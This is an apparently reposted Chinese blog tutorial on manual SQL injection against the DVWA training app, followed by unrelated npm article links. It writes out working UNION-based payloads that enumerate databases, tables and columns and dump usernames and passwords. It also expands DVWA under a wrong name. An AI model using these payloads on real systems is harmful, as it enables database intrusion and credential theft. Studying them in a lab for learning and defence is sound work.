博客
关于我
DVWA--SQL Injection(非盲注)--四个级别
阅读量:209 次
发布时间:2019-02-28

本文共 2372 字,大约阅读时间需要 7 分钟。

SQL 注入测试与渗透:DVWA 框架下的手动注入流程

SQL 注入是一种Web安全中的常见漏洞,攻击者通过向应用程序中输入恶意的SQL语句,破坏现有的查询逻辑,从而执行恶意操作。SQL注入漏洞能够导致数据库信息泄露、数据篡改甚至整个数据库的“脱库”,因此被广泛认为是Web安全中的高风险问题。

本文将基于DVWA( Dependency-Conflict Vulnerability Assessment )框架,逐步讲解手动SQL注入测试的过程,涵盖从低级别到高级别的测试方法,以及如何利用这些漏洞进行数据库渗透。


1. 判断注入类型:数字型 vs 字符型

在手动SQL注入中,首先需要判断注入类型,即注入是基于数字型还是字符型。以下是一些常见的测试方法:

  • 数字型注入

    • 输入 1,页面正常返回,表明注入点可能存在数字型漏洞。
    • 输入 1 and 1=2,页面异常或返回错误,说明可能存在数字型注入。
    • 输入 1' and '1'='1,页面异常或返回错误,说明字符型注入可能存在。
  • 字符型注入

    • 输入 1' and '1'='1,页面正常返回,表明注入点可能存在字符型漏洞。
    • 输入 1' and '1'='2,页面异常或返回错误,说明字符型注入可能存在。

通过以上测试,可以初步判断注入类型,并为后续操作做好准备。


2. 猜解字段数量

接下来需要确定SQL查询语句中所涉及的字段数量。可以通过以下方法进行测试:

  • 使用 ORDER BY

    • 输入 1 order by 1,页面正常返回,说明至少有一个字段。
    • 输入 1 order by 2,页面正常返回,说明至少有两个字段。
    • 输入 1 order by 3,页面异常返回,说明字段数量小于3。
  • 使用 UNION SELECT

    • 输入 1 union select 1,页面异常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,页面正常返回,说明至少有两个字段。
    • 输入 1 union select 1,2,3,页面异常返回,说明字段数量小于3。

通过以上方法,可以准确判断出SQL查询语句中涉及的字段数量,为后续注入操作提供依据。


3. 确定可注入字段位置

接下来需要确定哪些字段位置可以进行注入利用。可以通过以下方法实现:

  • 使用 UNION SELECT
    • 输入 1' and 1=2 union select 1,2,页面正常返回,说明两个字段位置都可以注入利用。
    • 输入 1' and 1=2 union select 1,3,页面异常返回,说明第三个字段位置不可注入。

通过观察返回的数据,可以判断哪些字段位置可以利用注入点,进而制定后续操作策略。


4. 查询当前使用的数据库

在SQL注入过程中,通常需要获取当前使用的数据库信息。可以通过以下方法实现:

  • 使用 UNION SELECT database()

    • 输入 1' and 1=2 union select database(),页面正常返回,显示当前数据库名称(如 dvwa)。
  • 查询所有数据库

    • 输入 1' and 1=2 union select table_schema from information_schema.tables,页面正常返回,列出所有数据库名称。

通过以上方法,可以获取当前使用的数据库信息,为后续操作提供重要数据支持。


5. 查询数据库中的表

在掌握数据库名称后,需要查询数据库中的所有表信息。可以通过以下方法实现:

  • 获取当前数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables where table_schema=database(),页面正常返回,列出当前数据库中的所有表名称。
  • 获取所有数据库中的表

    • 输入 1' and 1=2 union select table_name from information_schema.tables,页面正常返回,列出所有数据库中的表名称。

通过以上方法,可以获取目标数据库中的表信息,为后续操作提供数据支持。


6. 查询表中的字段

在掌握表名称后,需要查询表中的字段信息。可以通过以下方法实现:

  • 获取当前表中的字段
    • 输入 1' and 1=2 union select column_name from information_schema.columns where table_name='users',页面正常返回,列出指定表中的字段名称。

通过以上方法,可以获取表中的字段信息,为后续注入操作提供重要数据支持。


7. 查询字段的具体值

在掌握字段名称后,需要查询字段的具体值。可以通过以下方法实现:

  • 获取用户信息

    • 输入 1' and 1=2 union select user_id, first_name, last_name from users,页面正常返回,列出用户信息。
  • 获取密码信息

    • 输入 1' and 1=2 union select user_id, password from users,页面正常返回,列出用户账号和密码。

通过以上方法,可以获取字段的具体值,完成数据库渗透。


8. 总结与建议

通过以上步骤,可以逐步完成SQL注入测试的整个流程。需要注意以下几点:

  • 测试环境的准备:确保测试环境的安全性,避免对生产环境造成影响。
  • 工具的选择:手动注入工具的选择可以根据具体需求进行调整,如使用 sqlmap 等自动化工具。
  • 防护措施:了解并遵守Web应用的安全最佳实践,减少SQL注入漏洞的发生概率。
  • 通过以上方法,可以在DVWA框架中安全地进行SQL注入测试,并掌握数据库渗透的关键技术。

    转载地址:http://shqi.baihongyu.com/

    你可能感兴趣的文章
    npm install 报错 ERR_SOCKET_TIMEOUT 的解决方法
    查看>>
    npm install 报错 fatal: unable to connect to github.com 的解决方法
    查看>>
    npm install 报错 no such file or directory 的解决方法
    查看>>
    npm install报错,证书验证失败unable to get local issuer certificate
    查看>>
    npm install无法生成node_modules的解决方法
    查看>>
    npm install的--save和--save-dev使用说明
    查看>>
    npm node pm2相关问题
    查看>>
    npm run build 失败Compiler server unexpectedly exited with code: null and signal: SIGBUS
    查看>>
    npm run build报Cannot find module错误的解决方法
    查看>>
    npm run build部署到云服务器中的Nginx(图文配置)
    查看>>
    npm run dev 报错PS ‘vite‘ 不是内部或外部命令,也不是可运行的程序或批处理文件。
    查看>>
    npm scripts 使用指南
    查看>>
    npm should be run outside of the node repl, in your normal shell
    查看>>
    npm start运行了什么
    查看>>
    npm WARN deprecated core-js@2.6.12 core-js@<3.3 is no longer maintained and not recommended for usa
    查看>>
    npm 下载依赖慢的解决方案(亲测有效)
    查看>>
    npm 安装依赖过程中报错:Error: Can‘t find Python executable “python“, you can set the PYTHON env variable
    查看>>
    npm.taobao.org 淘宝 npm 镜像证书过期?这样解决!
    查看>>
    npm—小记
    查看>>
    npm介绍以及常用命令
    查看>>